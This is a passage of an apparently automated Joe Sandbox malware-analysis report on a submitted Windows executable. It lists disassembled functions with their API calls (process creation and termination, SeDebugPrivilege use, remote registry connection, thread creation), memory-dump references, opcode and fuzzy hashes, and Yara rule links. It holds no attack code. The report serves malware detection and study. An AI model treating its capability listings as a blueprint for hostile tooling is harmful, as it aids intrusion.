                                    • Opcode Fuzzy Hash: 31108cd5749f4f0f443b5d4ccc8602c4ff79804ba97170ff082a73b80218035a
                                    • Instruction Fuzzy Hash: 61F11875A04209EFCB08EF94C884EAEB7B9FF49315F108559F915AB250DB31AE45CF90
                                    Function 001924D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 001924F5
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00192688
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001926AC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001926EC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0019270E
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0019286F
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001928A1
                                    • CloseHandle.KERNEL32(?), ref: 001928D0
                                    • CloseHandle.KERNEL32(?), ref: 00192947
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 914248cebb5d09b230acde6f1ffddb12b29e33f531936e2f9e7254b8894d1936
                                    • Instruction ID: c7f75a8dc996720bc4e3d34bf21839a0257b3c8f3a3bf506c2d2d54489ed6ed3
                                    • Opcode Fuzzy Hash: 914248cebb5d09b230acde6f1ffddb12b29e33f531936e2f9e7254b8894d1936
                                    • Instruction Fuzzy Hash: 31D1BF31604301EFCB14EF24D891A6EBBE5BF95310F14856DF8999B2A2DB31EC45CB92
                                    Function 0014B73E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0014B759,?,00000000,?,?,?,?,0014B72B,00000000,?), ref: 0014BA58
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0014B72B), ref: 0014B7F6
                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0014B72B,00000000,?,?,0014B2EF,?,?), ref: 0014B88D
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 001AD8A6
                                    • DeleteObject.GDI32(00000000), ref: 001AD91C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 2402799130-0
                                    • Opcode ID: ae0fbdd45102a7ccd9049175958e6ab78cc291537b3cefa3b45eff3681339be3
                                    • Instruction ID: 159983b19f1f7758ced881f03b8dce7cfdd88ecfcc3033d854e10218d86e7b07
                                    • Opcode Fuzzy Hash: ae0fbdd45102a7ccd9049175958e6ab78cc291537b3cefa3b45eff3681339be3
                                    • Instruction Fuzzy Hash: 15618B34509A01EFDB299F15E988B36B7B5FF96326F15051DE44686EB0C7B4E8D0CB40
                                    Function 0019B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0019B3F4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: a538c0be4e8e72851192620ae982683051c9c30c58fa2c9650715ea5b0a6209f
                                    • Instruction ID: 2c7999a5bbeba2b4f1f2ba7f64b13cfbafe6cf19ba44061ea7dc6fc4b0ea8b45
                                    • Opcode Fuzzy Hash: a538c0be4e8e72851192620ae982683051c9c30c58fa2c9650715ea5b0a6209f
                                    • Instruction Fuzzy Hash: E9519030608204BBEF249F28EEC9BAD3B65BB05324F654111FA19D75E2D7B1EA80DB51
                                    Function 0014A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 001ADB1B
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001ADB3C
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001ADB51
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001ADB6E
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001ADB95
                                    • DestroyCursor.USER32(00000000), ref: 001ADBA0
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001ADBBD
                                    • DestroyCursor.USER32(00000000), ref: 001ADBC8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                    • String ID:
                                    • API String ID: 3992029641-0
                                    • Opcode ID: 8252ef03d06286b103edac8c6826fd08ec0364dad2eeab2969168fc72d747baa
                                    • Instruction ID: fe5511ce209b878aaa5b644b4b49a178a4b15da44f0352e288ebb1a04992507d
                                    • Opcode Fuzzy Hash: 8252ef03d06286b103edac8c6826fd08ec0364dad2eeab2969168fc72d747baa
                                    • Instruction Fuzzy Hash: 89518C74640608EFDB24DF64DC81FAA77B5AF19360F520628F94697AA0D7B1AD80CB50
                                    Function 00177555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00175FA6,?), ref: 00176ED8
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00175FA6,?), ref: 00176EF1
                                      • Part of subcall function 001772CB: GetFileAttributesW.KERNEL32(?,00176019), ref: 001772CC
                                    • lstrcmpiW.KERNEL32(?,?), ref: 001775CA
                                    • _wcscmp.LIBCMT ref: 001775E2
                                    • MoveFileW.KERNEL32(?,?), ref: 001775FB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    • Opcode ID: 61f208b6c7b88e3251e912b6d8308423cee57a20b89012d1caed9516903f08b0
                                    • Instruction ID: fc02e10f25e29d4e875046f2a19a53e05c7404e2b7f62df6219e3ee460eee08b
                                    • Opcode Fuzzy Hash: 61f208b6c7b88e3251e912b6d8308423cee57a20b89012d1caed9516903f08b0
                                    • Instruction Fuzzy Hash: 52515EB2A092199ADF55EB94D841DDE73BC9F1D310F1085EAFA09E3081EB7496C9CF60
                                    Function 0014EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,001ADAD1,00000004,00000000,00000000), ref: 0014EAEB
                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,001ADAD1,00000004,00000000,00000000), ref: 0014EB32
                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,001ADAD1,00000004,00000000,00000000), ref: 001ADC86
                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,001ADAD1,00000004,00000000,00000000), ref: 001ADCF2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 5ebe434df4ddc327b31d947f47c31bb4d827a5eb533d86813aab56459f55bd8b
                                    • Instruction ID: 6d2a3b31ac747a602bd94127be1d724877599ba79158b6d8a83eeefd89f53e16
                                    • Opcode Fuzzy Hash: 5ebe434df4ddc327b31d947f47c31bb4d827a5eb533d86813aab56459f55bd8b
                                    • Instruction Fuzzy Hash: 214109B4604680EAD73D4B289D8DB7A7ED6FB56324F6A480DE08783D71DB70B880D711
                                    Function 0016B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0016AEF1,00000B00,?,?), ref: 0016B26C
                                    • RtlAllocateHeap.NTDLL(00000000,?,0016AEF1), ref: 0016B273
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0016AEF1,00000B00,?,?), ref: 0016B288
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0016AEF1,00000B00,?,?), ref: 0016B290
                                    • DuplicateHandle.KERNEL32(00000000,?,0016AEF1,00000B00,?,?), ref: 0016B293
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0016AEF1,00000B00,?,?), ref: 0016B2A3
                                    • GetCurrentProcess.KERNEL32(0016AEF1,00000000,?,0016AEF1,00000B00,?,?), ref: 0016B2AB
                                    • DuplicateHandle.KERNEL32(00000000,?,0016AEF1,00000B00,?,?), ref: 0016B2AE
                                    • CreateThread.KERNEL32(00000000,00000000,0016B2D4,00000000,00000000,00000000), ref: 0016B2C8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                    • String ID:
                                    • API String ID: 1422014791-0
                                    • Opcode ID: e740b360e5a738564abd11b627b5755b8753fa02dcfac3c1486f3aa26adf9eb9
                                    • Instruction ID: 58d2ad164f4f6f61f31f649bae028a5ab28d640b4ccb75831df77a7d89b85d16
                                    • Opcode Fuzzy Hash: e740b360e5a738564abd11b627b5755b8753fa02dcfac3c1486f3aa26adf9eb9
                                    • Instruction Fuzzy Hash: 3701CDB5240304BFE714AFA5EC8DF6B7BACEB88711F018511FA05DB6A1DB749840CB61
                                    Function 0018C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    • Opcode ID: 5e0b78b6205dd0618b0bda836e540f7026c11e4dfb46f8cd489efb1270d67de5
                                    • Instruction ID: 560eb9394ba306d604910ee63d63d46a4562cf353dfa14ed3c6eaa874e8bcc45
                                    • Opcode Fuzzy Hash: 5e0b78b6205dd0618b0bda836e540f7026c11e4dfb46f8cd489efb1270d67de5
                                    • Instruction Fuzzy Hash: C1E1A571A00219AFDF14EFA8D885AEE77B5EF58354F148029F905A7281E770AE45CFE0
                                    Function 0019172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00176532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00176554
                                      • Part of subcall function 00176532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00176564
                                      • Part of subcall function 00176532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 001765F9
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019179A
                                    • GetLastError.KERNEL32 ref: 001917AD
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001917D9
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00191855
                                    • GetLastError.KERNEL32(00000000), ref: 00191860
                                    • CloseHandle.KERNEL32(00000000), ref: 00191895
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: 04b4255c077a8b5218aa482bf1b712fb5e4f4bbf3472635cb5e4e167655f511d
                                    • Instruction ID: 76d8424ab40926df851939ee37d8224db2da73a10b1f4086a4b09c970f804c71
                                    • Opcode Fuzzy Hash: 04b4255c077a8b5218aa482bf1b712fb5e4f4bbf3472635cb5e4e167655f511d
                                    • Instruction Fuzzy Hash: 0641AE71600202AFDB09EF54C8D5F6DB7B5BF64310F058058F90A9F2D2DB74A980CB91
                                    Function 00175819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 001758B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: 132dff19d1e8b1e37a831cd3439e3fb910be39b062c8ba79d37228d7871043d4
                                    • Instruction ID: a5dd489ccb97324a491238dbad4c0ffc2a32c92bf60f95fe32414a6001655d16
                                    • Opcode Fuzzy Hash: 132dff19d1e8b1e37a831cd3439e3fb910be39b062c8ba79d37228d7871043d4
                                    • Instruction Fuzzy Hash: 44110031209B42FBE7055B669C42D6E33BE9F2D314B20403BF514E61C1E7F0AA404266
                                    Function 0017A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0017A806
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ArraySafeVartype
                                    • String ID:
                                    • API String ID: 1725837607-0
                                    • Opcode ID: 952196af1d0e10b4468c2fc7f327e8a31590b74f839f3ca486b7f957a677b4c7
                                    • Instruction ID: dd4ee2813025614b1f4fee992bdb2e5b66b12a901781355c84f1d36e867897b0
                                    • Opcode Fuzzy Hash: 952196af1d0e10b4468c2fc7f327e8a31590b74f839f3ca486b7f957a677b4c7
                                    • Instruction Fuzzy Hash: 44C1AF75A0420ADFDB04CF98D481BAEBBF4FF49315F248469E609E7251D734A981CB92
                                    Function 00176B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00176B63
                                    • LoadStringW.USER32(00000000), ref: 00176B6A
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00176B80
                                    • LoadStringW.USER32(00000000), ref: 00176B87
                                    • _wprintf.LIBCMT ref: 00176BAD
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00176BCB
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 00176BA8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    • Opcode ID: 334336ec54bb494b5ec426f6e08d5065ac15e27b998d0ee101c5f7810cc3b67e
                                    • Instruction ID: fa0b3d7eeed6572e41b57c097b7ba82c0af8889d9d5e68757f89f72809e16b1a
                                    • Opcode Fuzzy Hash: 334336ec54bb494b5ec426f6e08d5065ac15e27b998d0ee101c5f7810cc3b67e
                                    • Instruction Fuzzy Hash: F60162F6900208BFE715A7A4AD89EF6337CD704304F0045A5B755E2041EB749EC48B71
                                    Function 00192B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00193C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00192BF6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharConnectRegistryUpper
                                    • String ID:
                                    • API String ID: 2595220575-0
                                    • Opcode ID: ef1204dc013b89ec7235fcc2e290c6ba2223c87c3dd64d5ef785485cf3840a84
                                    • Instruction ID: a176fcd9192046c970cd2c5c75735a63344b69950bfd6de3885c9de06bca0a57
                                    • Opcode Fuzzy Hash: ef1204dc013b89ec7235fcc2e290c6ba2223c87c3dd64d5ef785485cf3840a84
                                    • Instruction Fuzzy Hash: AD916871604201AFCB04EF54C891B6EB7E5FFA8310F14885DF99A972A2DB34E945CF82
                                    Function 0015A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __mtinitlocknum.LIBCMT ref: 0015A991
                                      • Part of subcall function 00157D7C: __FF_MSGBANNER.LIBCMT ref: 00157D91
                                      • Part of subcall function 00157D7C: __NMSG_WRITE.LIBCMT ref: 00157D98
                                      • Part of subcall function 00157D7C: __malloc_crt.LIBCMT ref: 00157DB8
                                    • __lock.LIBCMT ref: 0015A9A4
                                    • __lock.LIBCMT ref: 0015A9F0
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,001E6DE0,00000018,00165E7B,?,00000000,00000109), ref: 0015AA0C
                                    • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0015AA29
                                    • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0015AA39
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
